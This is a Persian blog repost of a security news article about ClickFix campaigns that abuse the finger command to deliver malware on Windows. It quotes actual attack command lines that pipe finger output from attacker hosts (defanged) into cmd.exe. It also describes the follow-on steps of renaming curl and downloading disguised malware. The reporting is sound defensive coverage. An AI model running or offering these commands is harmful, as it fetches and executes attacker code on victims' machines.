پروتکل «انگشت» با قدمت چند دهه در حملات بدافزار ClickFix مورد سوءاستفاده قرار گرفت

 


دستور «انگشت» که قدمتی چند دهه‌ای دارد، دوباره در حال بازگشت است و مهاجمان از این پروتکل برای بازیابی دستورات از راه دور و اجرای آنها در دستگاه‌های ویندوز استفاده می‌کنند.


در گذشته، مردم از دستور انگشت برای جستجوی اطلاعات مربوط به کاربران محلی و راه دور در سیستم‌های یونیکس و لینوکس از طریق پروتکل انگشت استفاده می‌کردند، دستوری که بعداً به ویندوز اضافه شد. اگرچه هنوز پشتیبانی می‌شود، اما امروزه در مقایسه با محبوبیت آن در دهه‌های گذشته، به ندرت مورد استفاده قرار می‌گیرد.


هنگام اجرا، دستور انگشت اطلاعات اولیه در مورد یک کاربر، از جمله نام کاربری، نام (در صورت تنظیم در /etc/passwd)، فهرست خانه، شماره تلفن‌ها، آخرین بازدید و سایر جزئیات را برمی‌گرداند.


اخیراً، کمپین‌های مخربی وجود داشته‌اند که از پروتکل انگشت در حملاتی که به نظر می‌رسد ClickFix باشند، استفاده می‌کنند و دستوراتی را برای اجرا در دستگاه‌ها بازیابی می‌کنند.


این اولین باری نیست که دستور انگشت به این روش مورد سوءاستفاده قرار می‌گیرد، زیرا محققان در سال ۲۰۲۰ هشدار دادند که از آن به عنوان یک LOLBIN برای دانلود بدافزار و فرار از شناسایی استفاده شده است.


سوءاستفاده از دستور finger

ماه گذشته، MalwareHunterTeam، محقق امنیت سایبری، یک فایل دسته‌ای [VirusTotal] را با BleepingComputer به اشتراک گذاشت که هنگام اجرا، از دستور "finger root@finger.nateams[.]com" برای بازیابی دستورات از یک سرور finger از راه دور استفاده می‌کرد، که سپس با اتصال آنها به cmd.exe به صورت محلی اجرا می‌شدند.


به عنوان مثال، شخصی در Reddit اخیراً هشدار داد که قربانی حمله ClickFix شده است که یک Captcha را جعل کرده و از او خواسته است تا یک دستور ویندوز را برای تأیید انسان بودن خود اجرا کند.


در پست Reddit آمده است: "من فقط عاشق verify you are human win + r شدم. چه کار کنم؟"


من عجله داشتم و در نهایت در cmd prompt خود عبارت زیر را وارد کردم:"


"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' تأیید کنید که انسان هستید - ENTER را فشار دهید.


اگرچه میزبان دیگر به درخواست‌های finger پاسخ نمی‌دهد، یکی دیگر از کاربران Reddit خروجی را ضبط کرد.


این حمله با اجرای finger vke@finger.cloudmega[.]org و ارسال خروجی آن از طریق پردازنده فرمان ویندوز، cmd.exe، از پروتکل Finger به عنوان یک روش تحویل اسکریپت از راه دور سوءاستفاده می‌کند.


این باعث می‌شود دستورات بازیابی شده اجرا شوند که یک مسیر با نام تصادفی ایجاد می‌کند، curl.exe را در یک نام فایل تصادفی کپی می‌کند، از فایل اجرایی curl که تغییر نام داده شده است برای دانلود یک آرشیو زیپ که به عنوان PDF [VirusTotal] از cloudmega[.]org پنهان شده است استفاده می‌کند و یک بسته بدافزار پایتون را استخراج می‌کند.

منبع

Comments

Post a Comment

Popular posts from this blog

معرفی سایت خبری نیو نیوز 1

نیو نیوز 1   اخبار   سیاسی   اجتماعی   حقوقی   انگیزشی   آموزشی   آشپزی   پزشکی   اخبار حوادث   زیبایی و زندگی   سلامتی   کشاورزی محیط زیست   هواشناسی   تکنولوژی   علم و تکنولوژی   ارتباطات   علم و فناوری   خودرو   کامپیوتر   موبایل   انرژی   سرگرمی   فرهنگی   ورزشی   فیلم و سریال موسیقی   کتاب   گردشگری   بازی و سرگرمی   بازار   ارزهای دیجیتال   اشتغال   اقتصاد   تجارت   طراحی   طراحی دیزاین   فشن   غذا  
Read more

معرفی سایت خبری خبر نسیم

Image
خبر نسیم     سیاسی   اجتماعی   تکنولوژی   سرگرمی   بازار     حقوقی   انگیزشی   آموزشی   آشپزی   پزشکی   اخبار حوادث   زیبایی و زندگی   سلامتی   کشاورزی   محیط زیست   هواشناسی   علم و تکنولوژی   ارتباطات علم و فناوری خودرو کامپیوتر موبایل انرژی   فرهنگی   ورزشی   فیلم و سریال   موسیقی   کتاب   گردشگری   بازی و سرگرمی   ارزهای دیجیتال   اشتغال   اقتصاد   تجارت   طراحی سایت   طراحی دیزاین   فشن   غذا  
Read more

معرفی سایت خبری نیوز آبی

Image
  معرفی سایت خبری نیوز آبی خبر   حقوقی   انگیزشی   آموزشی   آشپزی   انگیزشی   پزشکی   حوادث   زیبایی و زندگی   سلامتی   کشاورزی   محیط زیست   هواشناسی   علم و تکنولوژی   ارتباطات   علم و فناوری خودرو   کامپیوتر   موبایل   انرژی   فرهنگی   ورزشی   فیلم و سریال   موسیقی   کتاب   گردشگری   بازی و سرگرمی   ارزهای دیجیتال   اشتغال   اقتصاد   تجارت     طراحی   طراحی دیزاین   فشن   غذا   اجتماعی   تکنولوژی   سرگرمی   بازار    
Read more